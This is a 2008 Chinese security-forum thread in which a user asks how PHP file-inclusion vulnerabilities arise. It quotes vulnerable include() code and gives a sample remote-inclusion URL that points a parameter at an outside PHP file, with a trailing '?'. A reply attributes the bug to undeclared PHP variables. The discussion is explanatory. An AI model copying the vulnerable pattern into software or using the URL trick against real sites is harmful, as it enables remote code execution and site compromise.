标题:
[讨论]php文件包含的问题
[打印本页]
作者:
s37su37
时间:
2008-7-20 23:18
标题:
[讨论]php文件包含的问题
[讨论]php文件包含的问题
议题作者:消失再消失
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com
)
老是弄不懂这种漏洞是怎么来的,网上的包含漏洞介绍大约都是这样一段代码:
....
$id=$_GET["id"];
include($id);
....
因为变量id能被人为任意控制,所以造成了包含漏洞。
这里很容易理解。
但是看别人发布的文件包含漏洞是基本是这样类型的代码:
....
include_once $edp_relative_path."admin/serverdata.php";
....
只要向变量edp_relative_path提交一个webshell的地址,就能执行webshell了。
这里就不明白了,edp_relative_path这个变量是怎么来的?为什么可以人为控制?
我找了很久关于edp_relative_path这个变量的代码,都没有发现是哪里赋的值。
还有就是,为什么有些远程包含漏洞在包含了文件之后还要加一个“?”啊?如“
http://www.bajinzhi.net/l.php?i=http://bbb.com/love.php?
”
请高人指点啊小鸡鸡重出江湖了~~!!
帖子119 精华
0
积分3244 阅读权限100 性别男 在线时间143 小时 注册时间2007-7-31 最后登录2008-7-18
查看详细资料
报告
TOP
让女孩一夜变的更有女人味
dingking
荣誉会员
作者:
TAMAMA
时间:
2008-7-20 23:18
貌似PHP中不需要先定义变量的。~直接 $xxx 就可以用了。~。~~
include_once $edp_relative_path."admin/serverdata.php"; 直接定义就赋值了.....
~~
昨天是明天的前天今天是昨天的明天明天是昨天的后天 ╰o╯╰o╯
帖子741 精华
2
积分4784 阅读权限100 性别男 在线时间756 小时 注册时间2005-6-17 最后登录2008-7-18
查看详细资料
报告
TOP
您知道您年薪应是多少?
winger
晶莹剔透§烈日灼然
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2